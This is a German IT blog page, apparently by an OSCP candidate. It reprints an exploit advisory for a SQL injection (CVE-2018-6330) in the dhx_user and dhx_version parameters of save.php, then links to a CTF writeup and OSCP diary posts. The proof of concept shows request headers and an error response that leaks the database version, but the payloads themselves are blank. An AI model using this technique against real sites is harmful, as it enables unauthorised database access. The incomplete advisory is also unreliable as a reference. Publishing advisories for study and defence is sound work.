IT Blog

Active Directory - Exchange - Security News und Anleitungen

CVE-2018-6330 Laravel SQL-Injection

#Exploit Title: Laravel SQLinjection 5.4.15

#Date: 26.01.2018

#Software Link:

# Exploit Author: Gianluca Bonanno

# Contact:

# CVE: CVE-2018-6330

# Category: Webapps

# Version : 5.4.15

# Tested on : Apache 2.4.29

  1. Description

Any registered user can exploit the SQLinjection because it is not sanitized inside the save.php. The affected Parameters are dhx_user and dhx_version.

  • Proof of Concept

Login as user, then use the following request:

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64;
rv:58.0) Gecko/20100101 Firefox/58.0<
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: href=““>
X-Requested-With: XMLHttpRequest

In your Response you will see a:

You have an Error in your Mysql Syntax.

To get the Database Version displayed you can send the following Payload:


The Response will look like this:


<span class=“exception_message“>PDO – sql execution failed<br />

XPATH syntax error: ‚\qqvkq5.7.18-1qvxqq'</span>


Quaoar CTF writeup

I had nothing to do the last few days so i got a bit of fun time with Quaoar. Thanks to Viper for a nice and simple CTF. You can find my Writeup here

OSCP Prüfung bestanden!

Hier findet Ihr mein Bericht zur Prüfung

OSCP Tag 10 bis Ende / Day 10 till end

Hier findet ihr meinen aktuellen Eintrag zum OSCP


Here you can find my new Blogentry for OSCP

OSCP Day 8 – 10

New entry Day 8 – 10 here

Neuer Tagebuch eintrag Tag 8 – 10  hier

OSCP Tagebuch / OSCP Diary Week 1

New entry for my OSCP Diary here


Neuer eintrag für mein OSCP Tagebuch hier

OSCP Tagebuch / Diary Day 1-3

Here you can find my work for Day 1-3

OSCP Vorbereitungen / Preparations

Wie ich mich momentan auf den OSCP (Offensive Security Certified Professional) vorbereite erfahrt ihr hier .

OSCP Anmeldung – Check

Ja es ist soweit ich habe mich offiziel für den OSCP von den Machern von Kali registriert. Wie die Anmeldung abläuft erfahrt ihr HIER


Einstieg in Penetration Tests ?

Ihr wollt als Pentester starten und wisst nicht wo und wie? Mit dem CSH findet Ihr den perfekten Einstieg als Anfänger. Mehr Informationen HIER.

« Ältere Beiträge

© 2020 IT Blog

Theme von Anders NorénHoch ↑